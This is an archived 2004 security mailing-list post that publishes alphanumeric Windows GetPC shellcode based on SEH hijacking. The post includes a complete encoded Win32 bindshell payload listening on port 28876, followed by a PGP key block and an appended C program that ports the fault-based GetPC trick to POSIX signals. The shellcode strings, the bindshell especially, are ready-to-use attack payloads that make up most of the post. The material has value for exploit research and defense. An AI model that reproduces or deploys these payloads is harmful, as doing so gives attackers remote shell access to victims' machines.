Vuln Dev
Alphanumeric GetPC code. (was: GetPC code (was: Shellcode from ASCII)) Jan 28 2004 03:58PM
Berend-Jan Wever (SkyLined edup tudelft nl)
Hi all,

There was a thread about writing ASCII GetPC code about half a year ago on
vuln-dev. I've been away a few months; that's why I haven't written this mail
earlier.

I've developed 100% alphanumeric GetPC code for win NT/2K/XP based on work
by Costin Ionescu:
"VTX630VXH49HHHPhYAAQhZYYYYAAQQDDDd36FFFFTXVj0PPTUPPa301089";
This code uses fs to get the current SEH address and overwrites it with a
new SEH. Then it causes an exception, passing execution to the new SEH. This
SEH can determine the location where the exception took place from the
information provided about the exception by the OS. It then transfers
execution back, passing the location of the code along in %ecx. Should work
100% of the time.

I've also developed a 100% UPPERCASE alphanumeric GetPC code:
"VTX630WTX638VXH49HHHPVX5AAQQPVX5YYYYP5YYYD5KKYAPTTX638TDDNVDDX4Z4A63861816";
This code will assume the start of the SEH chain is at the top of the stack
and you have not used more than 65536 bytes of stack. (SEH @ 0xXXXXffe4
where XXXX is taken from %esp) The resulting address SHOULD point to the
last SEH in the chain, which will be overwritten and then called by causing
an exception, just like the "normal" SEH GetPC.
Because this code assumes you have not used more than 65535 bytes of stack
or fucked up %esp and because it hijacks the LAST SEH (if an earlier SEH
handles the exception, the code will not work!), this code will not work
under some conditions.

In addition to these GetPC codes, I've written an UPPERCASE alphanumeric
shellcode en-/decoder, source is attached. The decoder works on any IA32/x86
system, regardless of OS/SP unlike the GetPC code which is windows specific.
This will allow you to write OS/SP spanning uppercase alphanumeric
shellcodes like this w32 bindshell (port 28876):
VTX630WTX638VXH49HHHPVX5AAQQPVX5YYYYP5YYYD5KKYAPTTX638TDDNVDDX4Z4A63861816IIIIIIQZVTX630VX4A0B5HH0B20BBVX2BCBH4A2AC0ACTBCQB0ACAVX4Z8BCJOMNOASBLFFK8BTBSKHBTNPKHBWNAMJKHJ6JPJVN6NFBPB0JFCSDCPRFFJVGGCWDSOEFEKKA7GJJNPOJNFMBPBPB0IXONIHELA8NNB9A0BPBPFUJ6A0APBPBPKKDRMWKJM7JNLKBPBPB0ASBLBEBUBUB5BTBUBTB5KKHJEEF3IWJNHJBPB0BPI8HLACBLB5BEJVDPBPB7NLIHBNBULVB1B5HEKKAXFKNBPKJNLHB0BPB0ASBLB5HUKKCMLOJUKIJNNWBPBPBPJULFBQFUBEHUKKG4COH5HLJNNVBPB0BPJ6CVMFFVB0I8ANACKMB5BEBUCECUJ6APA0BPB0CUCECECUCECECECECECULFF4I8HNB5EUCUCUCECUF5H5CUCUCEC4CEKTCEC5A5CEIXMOKKARBME0BMJNMRBPBPBPASBLJTKHFTFRFPKKCTKLMXOUJNNABPB0BPMUMEMUKKDQKFM6BMJNOPB0BPBPA3BLBUIHMOKKIVMQD4LCJNB0BPBPBPHUGUK8EDN3K8FUE0JGAPLNDUK8DUB2APLNACBLACILATKXF3LXAPPNASOOALOLCQNJAPGLEHBLEWHOICOMEWLNLEKXLUF2APKNHFKHNPKTKHLENQAPKNKXFPKXAPJNOUP5OOBNZ

Thanks:
Costin Ionescu for the idea behind w32 SEH GetPC.
HD Moore for the shellcodes and concepts at www.metasploit.com

Greets: 0dd, #netric, (K)(L)(F) for Suzan

Cheers,
SkyLined

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: PGP 8.0 - not licensed for commercial use: www.pgp.com
Comment: Berend-Jan Wever - skylined (at) edup.tudelft (dot) nl [email concealed]

mQGiBD//MyARBADnHLyg2lUBEddhdWAVBxovYU5PetLk2y3HZKguauHS6tT7sNPb
WR4JuRZ5G9uTkgS/JlVl8jhdvAfOhAsXnlSwfBljPSt7ylHkmG/0TUQV14+OVIks
joq80V2yGNT8oRGC/HMk6d20THXFsqiE8pLF5OVdcF0PpTP14OeavvWp2QCg/2Yb
nk1i1VSjOCmPudJ+7klQbI0D/3pRkXQofpYslG7hBaEndDOVFRo9rgF5D4cbmIo0
eH9LEtzHiB+Q1wgJ2CUxWQeYtqCE5upBOl5vwnlY86vH6QdxZ7JdOhyWU2bgbb+D
xZrWgE1LibVdqC6ow2NgmCTQhvnBVpuvrpfe50iohujCzzI4n8Vwolg4jQtCmsU/
2glaA/9vM9T09rlq0CMQnwI3o1WPuyaVd2RrODo8AScKmYkukiuOCF7HSB//hGOX
1HXkM+yRi7ZtGVuX2sY2wkjiZa1OUuL28I5FInJQxoS8FuMtlEY2vqVHcw01KL3O
NQPvVMNoieKM3hrLGUNTgvsiGEFZYzp908bvicGh3c1yrbo6XLQrQmVyZW5kLUph
biBXZXZlciA8c2t5bGluZWRAZWR1cC50dWRlbGZ0Lm5sPokAWAQQEQIAGAUCP/8z
IAgLCQgHAwIBCgIZAQUbAwAAAAAKCRDnF8rcdEbf3T07AKDQp2C/tLe5X8v1iUBa
TlEogOUvrQCg7SHA3QPk2f/6wnl9sqhADvXdS1W5Ag0EP/8zIBAIAPZCV7cIfwgX
cqK61qlC8wXo+VMROU+28W65Szgg2gGnVqMU6Y9AVfPQB8bLQ6mUrfdMZIZJ+AyD
vWXpF9Sh01D49Vlf3HZSTz09jdvOmeFXklnN/biudE/F/Ha8g8VHMGHOfMlm/xX5
u/2RXscBqtNbno2gpXI61Brwv0YAWCvl9Ij9WE5J280gtJ3kkQc2azNsOA1FHQ98
iLMcfFstjvbzySPAQ/ClWxiNjrtVjLhdONM0/XwXV0OjHRhs3jMhLLUq/zzhsSlA
GBGNfISnCnLWhsQDGcgHKXrKlQzZlp+r0ApQmwJG0wg9ZqRdQZ+cfL2JSyIZJrqr
ol7DVekyCzsAAgIIAPBwtE5Q5qtEuK/1a7rNrHvRTpgTJpw9P6B61TfGACiucXne
Xo28DbabGuD8yfiNaXTHKt9NAtfHxVTL1hFUIfK5dZ9o6FG4pJFZtXfjmGqoac6A
G2zBNWNAr26OqoEKrFohJyJ8rcIY+FKrH5axaBc9II5cxcQebWoFXU/tGq+4yVaZ
4669mfHBSfiThe4N1hlcrlcehxUe3QFZYmQHYClXpldY0t3/N71k5jd6a1NZ5j9Z
kfTBzXTtbKERt1mM9gptU4LjGJQFoNBw6dRj+IQc4wJG6nAmKaQpOwMdPnii8Kz1
i+MRkW92vt8bfcXqA38XcASI5iqKmQCSSYoBW0qJAEwEGBECAAwFAj//MyAFGwwA
AAAACgkQ5xfK3HRG391CBgCffzGf174a1bKMu4EbOFfrD9eyj90An14tyn0tPGg5
IlutbA2EL52jJYz2
=OpSl
-----END PGP PUBLIC KEY BLOCK-----
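The exception-driven GetPC described in the post, as an added example that is not SkyLined's code: it carries the same idea over to POSIX signals so it can be compiled and run on Linux/glibc (x86, x86-64 or AArch64 assumed; the function and variable names are mine). Where the hijacked SEH receives the faulting address in the CONTEXT record the OS passes to it, a SA_SIGINFO handler receives it in the ucontext; the handler records that address and hands control back to the caller, which is the role the original stub's "transfer execution back with the location in %ecx" plays.

```c
#define _GNU_SOURCE
#include <setjmp.h>
#include <signal.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <ucontext.h>

/* Where the handler leaves the program counter of the faulting instruction. */
static volatile uintptr_t g_fault_pc;
static sigjmp_buf g_resume;

/* Pull the PC out of the context the kernel hands to a SA_SIGINFO handler.
   Assumption: Linux/glibc register names; other libcs lay this out differently. */
static uintptr_t pc_from_context(const ucontext_t *uc)
{
#if defined(__x86_64__)
    return (uintptr_t)uc->uc_mcontext.gregs[REG_RIP];
#elif defined(__i386__)
    return (uintptr_t)uc->uc_mcontext.gregs[REG_EIP];
#elif defined(__aarch64__)
    return (uintptr_t)uc->uc_mcontext.pc;
#else
#error "no PC extraction written for this architecture"
#endif
}

/* The analogue of the overwritten SEH: the OS tells us where the fault was. */
static void fault_handler(int sig, siginfo_t *si, void *ctx)
{
    (void)sig;
    (void)si;
    g_fault_pc = pc_from_context((const ucontext_t *)ctx);
    /* The SEH GetPC jumps back into the shellcode with the address in ecx;
       here we jump back to the sigsetjmp point with it in a global. */
    siglongjmp(g_resume, 1);
}

/* Deliberately fault and return the PC at which the fault happened. */
__attribute__((noinline)) uintptr_t getpc_via_fault(void)
{
    struct sigaction sa, old_segv, old_bus;
    memset(&sa, 0, sizeof sa);
    sa.sa_sigaction = fault_handler;
    sa.sa_flags = SA_SIGINFO;
    sigemptyset(&sa.sa_mask);
    sigaction(SIGSEGV, &sa, &old_segv);
    sigaction(SIGBUS, &sa, &old_bus);

    g_fault_pc = 0;
    if (sigsetjmp(g_resume, 1) == 0) {
        /* A store through a NULL pointer the compiler cannot fold away. */
        int *volatile bad = NULL;
        *bad = 1;
    }

    /* Put the previous handlers back so the process behaves normally afterwards. */
    sigaction(SIGSEGV, &old_segv, NULL);
    sigaction(SIGBUS, &old_bus, NULL);
    return g_fault_pc;
}

/* Sanity check a shellcode author would want: the recovered address must lie
   inside the code that faulted. 4096 is an assumed upper bound on the size of
   getpc_via_fault as compiled. */
int pc_points_into_getpc(uintptr_t pc)
{
    uintptr_t lo = (uintptr_t)getpc_via_fault;
    return pc >= lo && pc < lo + 4096;
}

int main(void)
{
    uintptr_t pc = getpc_via_fault();
    printf("fault at %#lx, getpc_via_fault starts at %#lx, inside=%d\n",
           (unsigned long)pc, (unsigned long)(uintptr_t)getpc_via_fault,
           pc_points_into_getpc(pc));
    return pc_points_into_getpc(pc) ? 0 : 1;
}
```

Two differences from the Windows stub are worth keeping in mind. POSIX has a single handler per signal rather than a per-thread chain, so the uppercase variant's caveat about an earlier SEH handling the exception has no counterpart here; and a C program can unwind with siglongjmp, whereas shellcode has to patch the return path itself, which is exactly what the alphanumeric constraints make hard.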
